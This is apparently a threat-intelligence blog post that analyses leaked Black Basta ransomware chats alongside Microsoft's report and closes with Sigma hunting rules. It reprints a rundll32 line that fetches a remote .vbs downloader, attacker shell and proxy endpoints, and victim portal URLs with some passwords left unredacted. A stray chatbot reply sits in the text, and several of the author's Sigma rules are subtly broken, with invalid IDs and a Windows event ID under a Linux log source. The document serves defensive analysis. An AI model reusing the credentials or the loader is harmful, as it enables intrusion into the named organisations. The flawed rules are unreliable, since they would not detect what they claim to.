How leaked communications confirm Microsoft’s threat insights and reveal a persistent, adaptive cybercrime enterprise exploiting hybrid infrastructure and social engineering at scale.
In the first quarter of 2025, Microsoft Threat Intelligence published a detailed overview of the evolving ransomware ecosystem, highlighting significant developments such as the use of commodity ransomware by nation-state actors and advanced hybrid cloud exploitation techniques. This coincided with a major leak of internal communications from the Black Basta ransomware group, providing unprecedented insight into the operational methods of one of the most active and technically capable ransomware collectives. Analysis of the leaked Black Basta chat logs reveals that the group remains fully operational despite the exposure. Key actors, including aliases such as @usernamegg, @lapa, and @usernameugway, continued coordinating attacks through shared infrastructure and custom tooling. Their methods align closely with the tactics, techniques, and procedures attributed by Microsoft to groups like Storm-1674, Storm-1811, and Storm-2410. These include the exploitation of Citrix and VPN portals, weak authentication on ESXi hypervisors, credential stuffing attacks, and the use of remote access utilities and scripts for payload delivery.
Particularly notable is the group’s active development of social engineering methods, such as impersonating IT support staff in phone calls, mirroring the techniques attributed to Storm-2410 in Microsoft’s report. Combined with the observed use of lightweight downloaders, memory-based loaders, and obfuscated commands via tools like PowerShell and rundll32.exe, this illustrates a shift toward stealthier, more precise attack delivery. Furthermore, the internal communications show an increasing emphasis on operational security and infrastructure resilience. The actors discuss rotating delivery domains, staging different botnets for specific functions, and carefully avoiding detection through staggered attack timing and limited-volume delivery suggesting a high level of coordination and long-term planning.
Taken together, this fusion of Microsoft’s threat intelligence with firsthand data from the Black Basta leak provides strong evidence of a sophisticated and adaptive ransomware ecosystem. It also reveals how closed ransomware groups like Black Basta continue to evolve tactically while maintaining persistent activity, even under significant public scrutiny. These findings carry important implications for defenders, underscoring the need for targeted detection, proactive hardening of cloud infrastructure, and heightened vigilance around social engineering threats.
Detailed Overview of Threat Actor Activities and Indicators
The Black Basta chat leak reveals a network of coordinated operators — primarily aliases like @usernamegg, @lapa, @usernameugway, and others—engaging in a structured campaign that mirrors Microsoft-attributed activity of groups such as Storm-1674, Storm-1811, and Storm-2410.
1. Exploitation of Known Services Citrix, ESXi, Jenkins, VPNs
Participants frequently discuss and share infrastructure that exploits Citrix and Jenkins environments. One example includes:
Bot ID LK-CITRIX02_REDACTED_5AB8D71B IP | Country 80.190.xxx.x6 | DE Shell: 13.57.243.97:16854 Socks: 13.57.243.97:14983
This reflects the exploitation of Citrix, aligning with Microsoft’s report on Citrix and VPN-based lateral movement.
There is also direct reference to weakly secured ESXi servers:
https:/58.171.144.24:10002/ui/ root hahaha ... это короч exsi который любой пасс пропускает видимо
This demonstrates the abuse of ESXi misconfiguration, which Microsoft linked directly to Black Basta’s toolkit.
Jenkins scanning and exploitation is discussed:
нужно собрать еще айпишники jenkins также фофа шодан
indicating that they use tools like Shodan and FOFA for reconnaissance against exposed DevOps infrastructure.
Use of RDP, VPN & Harvested Credentials
The chat contains massive dumps of RDP and VPN portals with associated credentials, such as:
https://darpan.kvs.REDACTED.in/rdweb/...;KVS@DLREDACTED https://start.elvyonline.nl/...;sdejong@elvyonline;e4256ohN
This suggests widespread access to remote environments — useful both for initial access and lateral movement.
There’s also mention of sslvpn_logon.shtml endpoints with admin-level usernames:
https://79.141.1.193/sslvpn_logon.shtml :superuser:REDACTED:REDACTED
indicating VPN brute-force or credential stuffing as an entry point.
Social Engineering via IT Spoofing (Storm-2410, Storm-1674-like TTPs)
The actors openly coordinate voice-based social engineering, as seen in this exchange:
можно сделать что бы звонок проходил от it департамента ? ... да, сейчас как раз делаем
This mirrors Microsoft’s report on fake IT helpdesk calls by Storm-2410 and Storm-1674 using tools like Quick Assist and PowerShell.
Command-and-Control, Scripting, and Obfuscation
The use of PowerShell-based or loader-based execution is shown, such as:
rundll32.exe dll.dll,Enter http://temp.sh/ctGHj/downloader.vbs
These are indicative of custom loaders or commodity malware delivery — supporting Microsoft’s note on Noiserv-like C2 channels and dual use of public and bespoke tools.
Bots and SOCKS proxies are coordinated for remote access and persistence:
Socks: 5.8.18.20:3026,3027 ssh cmd, INNOPHOS:REDACTED:Ilovepizza25!
Anti-Detection & Operational Security
The actors monitor blacklisting of infrastructure and carefully throttle delivery to avoid detection:
думаю если много прошлем домен быстро в блек залетит ... точечно давай сперва
Reflects real-time anti-spam/blacklist evasion strategy, an advanced operational behavior aligned with top-tier ransomware operators.
The chat reveals a tightly organized group using both commodity and custom tooling, consistent with RaaS operations and the “closed” nature of Black Basta as a platform. The level of collaboration, infrastructure sharing, and live coordination supports the notion of these actors as high-tier ransomware affiliates or core members.
Anticipatory Intelligence based on Dataset
Continued Focus on ESXi and Citrix Targets
There’s persistent operational discussion around ESXi servers with no authentication and default-password acceptance, indicating this vector remains both viable and preferred. Additionally, Citrix infrastructure, especially SSL VPN login portals, are repeatedly targeted with brute-force and credential stuffing like
это короч exsi который любой пасс пропускает видимо
LK-CITRIX02_cgaldi_5AB8D71B
sslvpn_logon.shtml :superuser:REDACTED:REDACTED
Implication: Actors are likely to continue leveraging misconfigured ESXi environments and unpatched Citrix SSL VPN instances in upcoming campaigns.
Increased Use of Fake IT Support for Initial Access
The actors are actively refining voice-based pretexts (e.g., pretending to be from an IT department), coordinating spoofed calls through call center
можно сделать что бы звонок проходил от it департамента ?
...
да, сейчас как раз делаем
Implication: Expect a broader rollout of voice phishing (vishing) as an access method potentially using automation or integrating deepfakes or spoofed Teams identities in the near future.
Resilient Payload Delivery via Simple Scripts & Multi-hosting
Tools like rundll32.exe, .vbs loaders, and multi-domain file delivery (e.g., transfer.sh, temp.sh, send.vis.ee) continue to appear. Actors discuss rotating domains to evade detection:
на разные домены сделаю
http://temp.sh/ctGHj/downloader.vbs
Implication: Malware delivery will likely remain lightweight, using fileless or memory-only techniques while relying on rotating public hosting for payload evasion.
Adversary Operational Security Is Increasing
There are deliberate attempts to avoid blacklisting, delay domain saturation, and limit mass emailing,
домен быстро в блек залетит
точечно давай сперва
Implication: Future attacks may appear lower volume but more targeted, with careful pacing to avoid detection especially in phishing and initial access stages.
Internal Coordination Suggests Scalability
Actors operate in structured workflows: discussing test windows, coordinated times, role distribution, and infrastructure segmentation (e.g., “не грузим с этой группы ботов”):
с этой группы ботов не грузим
в работу
так как это путь для движения
Implication: This suggests the group may scale operations by assigning infrastructure subsets for distinct phases (e.g., access, staging, encryption) mirroring advanced affiliate models.
Projected Operational Continuity
TTP / PatternIndicator in LogsLikely ContinuationESXi/Citrix ExploitsAuth bypass, brute-forceHighFake IT Call VishingCoordinated spoofing effortsHighSimple Script Loaders.vbs, rundll32.exe, C2 callbacksModerate-HighBlacklist Evasion TacticsStaggered sends, domain rotationHighBot Infrastructure SegmentationDefined bot group usageModerate
This projection is strictly based on the dataset’s behavioral indicators.
Let me know if you’d like a mapped version to MITRE’s PRE-ATT&CK or a watchlist of likely IOCs for monitoring.
In Q1 2025, Microsoft’s report signals critical developments in the ransomware ecosystem: rising usage of commodity ransomware by state actors, growing exploitation of hybrid cloud environments, and persistent abuse of social engineering and newly disclosed vulnerabilities. When this is correlated with the leaked Black Basta chat dataset, a highly coordinated threat landscape emerges, rooted in tactical consistency, adaptive delivery, and operational maturity.
Strategic Conclusions
Black Basta Continues Operating as a High-Tier Closed RaaS Collective
Despite Microsoft highlighting the leak of internal chats, the dataset shows no operational collapse. Instead, threat actors like @usernamegg, @lapa, and others maintain:
- Exploit chains involving Citrix, ESXi, Jenkins, and VPN portals.
- Credential harvesting and credential reuse.
- Coordinated deployment scripts using lightweight tools like rundll32, .vbs, and PowerShell.
This persistence suggests Black Basta’s operational core remains intact, resilient to internal exposure, and likely segmented enough to withstand compromise.
High Overlap with Storm-Labeled Activity (Storm-1674, Storm-2410, Storm-1811)
Microsoft identifies overlaps between Black Basta activity and groups such as Storm-1674 and Storm-2410. The chat logs substantiate this:
- Storm-1674: Use of PowerShell, C2 infrastructure like Noiserv, ESXi/Citrix exploitation.
- Storm-2410: Social engineering via fake IT calls explicitly coordinated in the logs for initial access.
- Storm-1811: Shared infrastructure, later silence mirrored by actor drop-off post-February.
This supports Microsoft’s assessment of convergence between multiple actor clusters inside or affiliated with the Black Basta ecosystem.
Anticipatory Indicators Signal Tactical Evolution
Looking forward, data in the chat logs suggests:
- Vishing will become more automated and precise, as actors refine IT spoofing pretexts.
- Infrastructure segmentation (e.g., distinct bot groups, SOCKS routing) will allow resilience and scale.
- Misconfigured cloud and hybrid systems (e.g., ESXi accepting any password) will remain key targets.
- Commodity tools (e.g., PowerShell, downloaders) will continue as payload vectors — supporting state actors like Moonstone Sleet moving into this space, as Microsoft noted.
Conclusion
Black Basta represents a stable, modular RaaS platform increasingly entangled with both cybercriminal and state-linked actors. Despite public leaks, the group continues leveraging both advanced infrastructure exploitation and low-friction access techniques like fake IT support. Microsoft’s threat report and the internal chat logs converge on one insight: Ransomware operations are growing more adaptable, persistent, and collaborative not less.
Threat Hunting Opportunities
1. Exploitation of Citrix and VPN Portals
Detects unauthorized access attempts to Citrix and VPN portals, which Black Basta operators have been known to exploit.
Sigma Rule:
title: Suspicious Citrix/VPN Portal Access
id: 1a2b3c4d-5e6f-7g8h-9i0j-k1l2m3n4o5p6
status: experimental
description: Detects potential unauthorized access to Citrix and VPN portals.
author: Your Name
date: 2025-04-17
logsource:
category: network
product: windows
detection:
selection:
EventID: 4625
TargetUserName|contains: ["Citrix", "VPN"]
condition: selection
fields:
- TargetUserName
- WorkstationName
- SourceNetworkAddress
- FailureReason
level: high
2. Abuse of ESXi Hypervisors
Description: Monitors for suspicious activities targeting ESXi hypervisors, such as login attempts with default or weak credentials.
Sigma Rule:
title: Suspicious ESXi Hypervisor Access Attempts
id: 2b3c4d5e-6f7g-8h9i-0j1k-l2m3n4o5p6q7
status: experimental
description: Detects potential unauthorized access attempts to ESXi hypervisors.
author: Your Name
date: 2025-04-17
logsource:
category: network
product: linux
detection:
selection:
EventID: 4625
TargetUserName|contains: ["root", "admin"]
WorkstationName|contains: ["esxi"]
condition: selection
fields:
- TargetUserName
- WorkstationName
- SourceNetworkAddress
- FailureReason
level: high
3. Use of Remote Access Tools
Description: Detects the execution of remote access tools like AnyDesk or TeamViewer, which may be used for unauthorized access.
Sigma Rule:
title: Execution of Remote Access Tools
id: 3c4d5e6f-7g8h-9i0j-1k2l-m3n4o5p6q7r8
status: experimental
description: Detects the execution of remote access tools which may indicate unauthorized access.
author: Your Name
date: 2025-04-17
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\AnyDesk.exe'
- '\TeamViewer.exe'
- '\RemoteUtilities.exe'
condition: selection
fields:
- Image
- CommandLine
- ParentImage
- User
level: medium
4. Obfuscated PowerShell Commands
Description: Identifies the use of obfuscated PowerShell commands, a technique often employed to evade detection.
Sigma Rule:
title: Obfuscated PowerShell Command Execution
id: 4d5e6f7g-8h9i-0j1k-2l3m-n4o5p6q7r8s9
status: experimental
description: Detects execution of obfuscated PowerShell commands.
author: Your Name
date: 2025-04-17
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'FromBase64String'
- 'Invoke-Expression'
condition: selection
fields:
- Image
- CommandLine
- ParentImage
- User
level: high
5. Ransom Note File Creation
Description: Monitors for the creation of ransom note files, which are indicative of ransomware activity.
Sigma Rule:
title: Ransom Note File Creation
id: 5e6f7g8h-9i0j-1k2l-3m4n-o5p6q7r8s9t0
status: experimental
description: Detects creation of ransom note files commonly used by ransomware.
author: Your Name
date: 2025-04-17
logsource:
category: file_creation
product: windows
detection:
selection:
FileName|contains:
- 'readme.txt'
- 'instructions.html'
- 'decrypt_files.txt'
condition: selection
fields:
- FileName
- FolderPath
- User
- ComputerName
level: high
6. CVE-2023–4966 Exploitation Attempt Citrix ADC Sensitive Information Disclosure
Description: Detects potential exploitation attempts of CVE-2023–4966, a vulnerability in Citrix ADC and NetScaler Gateway that allows sensitive information disclosure.
Sigma Rule:
title: CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure
id: ff349b81-617f-4af4-924f-dbe8ea9bab41
status: test
description: Detects potential exploitation attempt of CVE-2023-4966 via proxy logs.
author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (STRT)
date: 2023-11-28
references:
- https://support.citrix.com/article/CTX579459
- https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966
- https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/
- https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
- https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
tags:
- detection.emerging-threats
- attack.initial-access
- attack.t1190
- cve.2023-4966
logsource:
category: proxy
detection:
selection:
cs-method: 'GET'
cs-uri|contains: '/oauth/idp/.well-known/openid-configuration'
sc-status: 200
condition: selection
falsepositives:
- Vulnerability scanners
level: medium
Source: Detection.FYI
7. Remote Access Tool Services Installation
Detects the installation of services associated with remote access tools, which are often used by threat actors for unauthorized access.
Sigma Rule:
title: Remote Access Tool Services Have Been Installed - System
id: 1a31b18a-f00c-4061-9900-f735b96c99fc
status: test
description: Detects service installation of different remote access tools software.
author: Connor Martin, Nasreddine Bencherchali
date: 2022-12-23
modified: 2023-06-22
tags:
- attack.persistence
- attack.t1543.003
- attack.t1569.002
logsource:
category: system
product: windows
detection:
selection:
ServiceName|contains:
- 'AnyDesk'
- 'TeamViewer'
- 'UltraVNC'
- 'NetSupport'
condition: selection
falsepositives:
- Legitimate installations of remote access tools
level: medium
Source: Valhalla
8. Outbound Network Connection To Public IP Via Winlogon
Detects instances where the ‘winlogon.exe’ process initiates network communications with public IP addresses, which may indicate malicious activity.
Sigma Rule:
title: Outbound Network Connection To Public IP Via Winlogon
id: 7610a4ea-c06d-495f-a2ac-0a696abcfd3b
status: test
description: Detects a "winlogon.exe" process that initiates network communications with public IP addresses.
author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
date: 2023-04-28
modified: 2024-03-12
tags:
- attack.defense-evasion
- attack.execution
- attack.command-and-control
- attack.t1218.011
logsource:
category: network_connection
product: windows
detection:
selection:
Image: 'C:\Windows\System32\winlogon.exe'
DestinationIp|cidr:
- '0.0.0.0/0'
condition: selection
falsepositives:
- Legitimate remote desktop connections
level: high
Source: Valhalla
Rulehound repository:
Threat Hunting Opportunity detecting the Ransomware
9. Suspicious PowerShell Execution
Detects the execution of PowerShell with encoded commands, a common technique used by ransomware for obfuscation.
Sigma Rule:
title: Suspicious PowerShell Execution
id: cbd8e156-dc48-4dbf-939f-62e8c7b27b60
status: experimental
description: Detects execution of potentially malicious PowerShell commands used in ransomware attacks.
author: Abhinav Pandey
date: 2024-11-19
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- '-enc'
- '-e'
- 'Invoke-Expression'
- 'IEX'
condition: selection
fields:
- Image
- CommandLine
- ParentImage
- User
level: high
Source: Cyversity — Effective Threat Hunting: Black Basta Ransomware
10. Ransomware File Extension Creation
Monitors for the creation of files with extensions commonly used by Black Basta ransomware, such as .ransom or .basta.
Sigma Rule:
title: Ransomware File Extension Creation
id: 05329b66-1eb3-47fd-a8f1-c5c58e1d5ef7
status: experimental
description: Detects creation of files with extensions indicative of ransomware encryption.
author: Abhinav Pandey
date: 2024-11-19
logsource:
category: file_creation
product: windows
detection:
selection:
FileName|endswith:
- '.ransom'
- '.basta'
condition: selection
fields:
- FileName
- FolderPath
- User
- ComputerName
level: high
Source: Cyversity — Effective Threat Hunting: Black Basta Ransomware
11. Execution of Remote Access Tools
Detects the execution of remote access tools like AnyDesk, Quick Assist, or related payloads, which are often used by attackers for unauthorized access.
Sigma Rules
title: Execution of Remote Access Tools
id: 8a5c8e42-39dc-4c4f-a5b6-96bf5dbd93c9
status: experimental
description: Detects execution of tools like AnyDesk, Quick Assist, or related payloads.
author: Abhinav Pandey
date: 2024-11-19
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\AnyDesk.exe'
- '\QuickAssist.exe'
- '\AntispamAccount.exe'
- '\AntispamUpdate.exe'
- '\AntispamConnectUS.exe'
condition: selection
fields:
- Image
- CommandLine
- ParentImage
- User
level: high
Source: Cyversity — Effective Threat Hunting: Black Basta Ransomware
12. Shadow Copy Deletion via vssadmin
Identifies the use of vssadmin.exe to delete shadow copies, a tactic used by ransomware to prevent system recovery.Wazuh
Sigma Rule:
title: Shadow Copy Deletion via vssadmin
id: 100012
status: experimental
description: Detects usage of vssadmin.exe to delete shadow copies.
author: Wazuh Team
date: 2024-11-19
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\vssadmin.exe'
CommandLine|contains:
- 'delete'
- 'shadows'
condition: selection
fields:
- Image
- CommandLine
- ParentImage
- User
level: high
Source: Wazuh — How to detect Black Basta malware with Wazuh
13. Creation of Ransom Note Files
Description: Monitors for the creation of ransom note files, which are indicative of ransomware activity.
Sigma Rule:
title: Creation of Ransom Note Files
id: 100013
status: experimental
description: Detects creation of ransom note files commonly used by ransomware.
author: Wazuh Team
date: 2024-11-19
logsource:
category: file_creation
product: windows
detection:
selection:
FileName|contains:
- 'readme.txt'
- 'instructions.html'
- 'decrypt_files.txt'
condition: selection
fields:
- FileName
- FolderPath
- User
- ComputerName
level: high
Source: Wazuh — How to detect Black Basta malware with Wazuh
Inside Black Basta: Ransomware Resilience and Evolution After the Leak was originally published in Detect FYI on Medium, where people are continuing the conversation by highlighting and responding to this story.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.